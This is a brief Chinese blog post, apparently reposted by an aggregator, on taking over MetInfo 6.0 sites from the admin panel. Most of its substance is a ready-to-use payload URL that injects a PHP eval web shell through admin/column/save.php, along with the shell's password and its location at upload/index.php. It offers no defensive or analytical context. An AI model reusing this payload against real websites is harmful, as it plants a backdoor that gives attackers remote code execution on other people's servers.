米拓6.0后台Getshell(MetInfo)

Posted muxueblog

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了米拓6.0后台Getshell(MetInfo)相关的知识,希望对你有一定的参考价值。

主要记录下Payload

登录到后台

Payload:
admin/column/save.php?name=123&action=editor&foldername=upload&module=22;@eval($_POST[‘cnm‘]);/*

shell管理工具连接 密码:cnm

Shell在upload目录下的index.php

www.xxx.com/upload/index.php

以上是关于米拓6.0后台Getshell(MetInfo)的主要内容,如果未能解决你的问题,请参考以下文章

米拓CMS学习总结

米拓建站6.0未授权模板无法登陆后台怎么处理?

用metinfo米拓的程序建设网站,可以安装在服务器上吗

怎么修复网站漏洞之metinfo远程SQL注入漏洞修补

MetInfo 5.1 自动化getshell工具

织梦,帝国,米拓哪个做企业站更简单,没那么多时间研究。